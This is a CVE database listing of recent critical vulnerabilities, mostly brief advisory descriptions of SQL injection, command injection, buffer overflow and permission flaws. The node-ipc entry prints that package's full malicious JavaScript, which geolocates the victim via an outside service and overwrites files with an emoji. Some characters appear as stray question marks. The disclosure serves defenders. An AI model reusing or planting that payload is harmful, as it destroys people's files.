Vulnerabilities (CVE)

Total 15373 CVE
CVE Vendors Products Updated CVSS v2 CVSS v3
CVE-2022-29535 1 Zohocorp 1 Manageengine Opmanager 2022-05-17 7.5 HIGH 9.8 CRITICAL
Zoho ManageEngine OPManager through 125588 allows SQL Injection via a few default reports.
CVE-2022-0814 1 Ubigeo De Peru Para Woocommerce Project 1 Ubigeo De Peru Para Woocommerce 2022-05-17 7.5 HIGH 9.8 CRITICAL
The Ubigeo de Perú para Woocommerce WordPress plugin before 3.6.4 does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections
CVE-2022-29161 1 Xwiki 1 Xwiki 2022-05-17 6.8 MEDIUM 9.8 CRITICAL
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. The XWiki Crypto API will generate X509 certificates signed by default using SHA1 with RSA, which is not considered safe anymore for use in certificate signatures, due to the risk of collisions with SHA1. The problem has been patched in XWiki version 13.10.6, 14.3.1 and 14.4-rc-1. Since then, the Crypto API will generate X509 certificates signed by default using SHA256 with RSA. Administrators are advised to upgrade their XWiki installation to one of the patched versions. If the upgrade is not possible, it is possible to patch the module xwiki-platform-crypto in a local installation by applying the change exposed in 26728f3 and re-compiling the module.
CVE-2022-1013 1 Ays-pro 1 Personal Dictionary 2022-05-17 7.5 HIGH 9.8 CRITICAL
The Personal Dictionary WordPress plugin before 1.3.4 fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to a blind SQL injection vulnerability.
CVE-2022-0948 1 Pluginbazaar 1 Order Listener For Woocommerce 2022-05-17 7.5 HIGH 9.8 CRITICAL
The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection
CVE-2022-20120 1 Google 1 Android 2022-05-17 10.0 HIGH 9.8 CRITICAL
Product: AndroidVersions: Android kernelAndroid ID: A-203213034References: N/A
CVE-2022-22721 3 Apache, Debian, Fedoraproject 3 Http Server, Debian Linux, Fedora 2022-05-17 6.8 MEDIUM 9.8 CRITICAL
If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier.
CVE-2022-22720 3 Apache, Debian, Fedoraproject 3 Http Server, Debian Linux, Fedora 2022-05-17 7.5 HIGH 9.8 CRITICAL
Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling
CVE-2021-44790 6 Apache, Debian, Fedoraproject and 3 more 6 Http Server, Debian Linux, Fedora and 3 more 2022-05-17 7.5 HIGH 9.8 CRITICAL
A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.
CVE-2022-29411 1 Hermit Project 1 Hermit 2022-05-16 7.5 HIGH 9.8 CRITICAL
SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin <= 3.1.6 on WordPress allows attackers to execute SQLi attack via (&id).
CVE-2022-27002 1 Commscope 2 Arris Tr3300, Arris Tr3300 Firmware 2022-05-16 10.0 HIGH 9.8 CRITICAL
Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.
CVE-2022-23812 1 Node-ipic Project 1 Node-ipic 2022-05-16 10.0 HIGH 9.8 CRITICAL
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
CVE-2021-39658 1 Google 1 Android 2022-05-16 10.0 HIGH 9.8 CRITICAL
ismsEx service is a vendor service in unisoc equipment?ismsEx service is an extension of sms system service?but it does not check the permissions of the caller?resulting in permission leaks?Third-party apps can use this service to arbitrarily modify and set system properties?Product: AndroidVersions: Android SoCAndroid ID: A-207479207
CVE-2021-39635 1 Google 1 Android 2022-05-16 9.4 HIGH 9.1 CRITICAL
ims_ex is a vendor system service used to manage VoLTE in unisoc devices?But it does not verify the caller's permissions?so that normal apps (No phone permissions) can obtain some VoLTE sensitive information and manage VoLTE calls.Product: AndroidVersions: Android SoCAndroid ID: A-206492634
CVE-2021-41081 1 Zohocorp 1 Manageengine Network Configuration Manager 2022-05-16 7.5 HIGH 9.8 CRITICAL
Zoho ManageEngine Network Configuration Manager before ??125465 is vulnerable to SQL Injection in a configuration search.
CVE-2021-41080 1 Zohocorp 1 Manageengine Network Configuration Manager 2022-05-16 7.5 HIGH 9.8 CRITICAL
Zoho ManageEngine Network Configuration Manager before ??125465 is vulnerable to SQL Injection in a hardware details search.
CVE-2021-26334 3 Amd, Linux, Microsoft 3 Amd Uprof, Linux Kernel, Windows 2022-05-16 9.0 HIGH 9.9 CRITICAL
The AMDPowerProfiler.sys driver of AMD ?Prof tool may allow lower privileged users to access MSRs in kernel which may lead to privilege escalation and ring-0 code execution by the lower privileged user.
CVE-2020-15175 1 Glpi-project 1 Glpi 2022-05-16 6.4 MEDIUM 9.1 CRITICAL
In GLPI before version 9.5.2, the `?pluginimage.send.php?` endpoint allows a user to specify an image from a plugin. The parameters can be maliciously crafted to instead delete the .htaccess file for the files directory. Any user becomes able to read all the files and folders contained in “/files/”. Some of the sensitive information that is compromised are the user sessions, logs, and more. An attacker would be able to get the Administrators session token and use that to authenticate. The issue is patched in version 9.5.2.
CVE-2014-4982 1 Xorux 1 Lpar2rrd 2022-05-16 7.5 HIGH 9.8 CRITICAL
LPAR2RRD ? 4.53 and ? 3.5 has arbitrary command injection on the application server.
CVE-2022-1154 1 Vim 1 Vim 2022-05-16 7.5 HIGH 9.8 CRITICAL
Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646.